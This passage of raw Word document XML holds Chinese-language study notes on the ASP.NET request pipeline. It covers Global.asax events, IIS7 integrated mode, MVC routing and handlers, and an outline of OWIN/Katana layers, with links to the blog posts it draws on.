        <w:spacing w:after="240" w:line="320" w:lineRule="exact"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="Arial"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="Arial"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>·Application_Init：在应用程序被实例化或第一次被调用时，该事件被触发。对于所有的HttpApplication 对象实例，它都会被调用。</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·Application_Disposed：在应用程序被销毁之前触发。这是清除以前所用资源的理想位置。</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·Application_Error：当应用程序中遇到一个未处理的异常时，该事件被触发。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·Application_End：在HttpApplication 类的最后一个实例被销毁时，该事件被触发。在一个应用程序的生命周期内它只被触发一次。</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·Application_BeginRequest：在接收到一个应用程序请求时触发。对于一个请求来说，它是第一个被触发的事件，请求一般是用户输入的一个页面请求（URL）。</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·Application_EndRequest：针对应用程序请求的最后一个事件。</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·Application_PreRequestHandlerExecute：在 ASP.NET 页面框架开始执行诸如页面或 Web 服务之类的事件处理程序之前，该事件被触发。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·Application_PostRequestHandlerExecute：在 ASP.NET 页面框架结束执行一个事件处理程序时，该事件被触发。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·Applcation_PreSendRequestHeaders：在 ASP.NET 页面框架发送 HTTP 头给请求客户（浏览器）时，该事件被触发。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·Application_PreSendContent：在 ASP.NET 页面框架发送内容给请求客户（浏览器）时，该事件被触发。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·Application_AcquireRequestState：在 ASP.NET 页面框架得到与当前请求相关的当前状态（Session 状态）时，该事件被触发。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·Application_ReleaseRequestState：在 ASP.NET 页面框架执行完所有的事件处理程序时，该事件被触发。这将导致所有的状态模块保存它们当前的状态数据。</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·Application_ResolveRequestCache：在 ASP.NET 页面框架完成一个授权请求时，该事件被触发。它允许缓存模块从缓存中为请求提供服务，从而绕过事件处理程序的执行。</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·Application_UpdateRequestCache：在 ASP.NET 页面框架完成事件处理程序的执行时，该事件被触发，从而使缓存模块存储响应数据，以供响应后续的请求时使用。</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·Application_AuthenticateRequest：在安全模块建立起当前用户的有效的身份时，该事件被触发。在这个时候，用户的凭据将会被验证。</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·Application_AuthorizeRequest：当安全模块确认一个用户可以访问资源之后，该事件被触发。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·Session_Start：在一个新用户访问应用程序 Web 站点时，该事件被触发。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·Session_End：在 InProc 模式下运行时，当一个用户的会话超时、结束或他们离开应用程序 Web 站点时，该事件被触发。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="2250"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>集成模式IIS7：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="2702"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HttpContext</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="2702"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="2250"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IIs的常用功能及使用及配置：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="2702"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>请求筛选、失败请求跟踪等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="2250"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.Net MVC生命周期</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="2250"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Httphandler、HttpModule、Globar的编写及应用...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="3600"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="Arial"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MVC URLRouting Module对进入server的request进行了拦截，然后对request的handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="Arial"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进行了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="Arial"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>处理。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>asp.net WebForm和asp.net MVC两者的不同，是在于最终使用的IHttpHandle的不同。WebForm中使用的是Page这个Handler，MVC中使用的是MVCHander。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="3600"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>以上资料来自：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="3600"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.kungge.com/kungge/2484.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>asp.net管道模型学习（一）：Http请求处理流程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="3600"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.cnblogs.com/jeffwongishandsome/archive/2009/07/20/1513527.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>深入理解ASP.NET里的HttpModule机制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="3600"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "【ASP.NET】管道模型" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ASP.NET管道模型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="2250"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
        <w:rPr>
          <w:color w:val="3F51B5"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="3F51B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OWIN解耦</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Open Web Server Interface for .NET，定义了一种中间件在管道中用于处理请求和相关响应的标准方式，是种规范，用于解耦Web 服务器和Web 应用程序。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OWIN的实现：Katana（由微软早期开发的开源OWIN组件集合）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="2250"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OWIN Layer(定义的一系列层)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="2702"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Application(应用程序)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="2702"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Middleware(中间件)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="3154"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Nanacy.Owin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="3154"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>WebApi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="3154"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Signalr</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="3154"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FubuMVC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="3154"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Simple.Web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="3154"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DuoVia.Http</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="3154"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="2702"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Server(服务)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="3154"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Microsoft.Owin.Host.SystemWeb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="3154"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Microsoft.Owin.Host.HttpListener</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="3154"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Helios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="3154"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(Asp.Net5以后就是Microsoft.AspNet命名空间)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="3154"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="2702"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Host(宿主)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="3154"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="84"/>
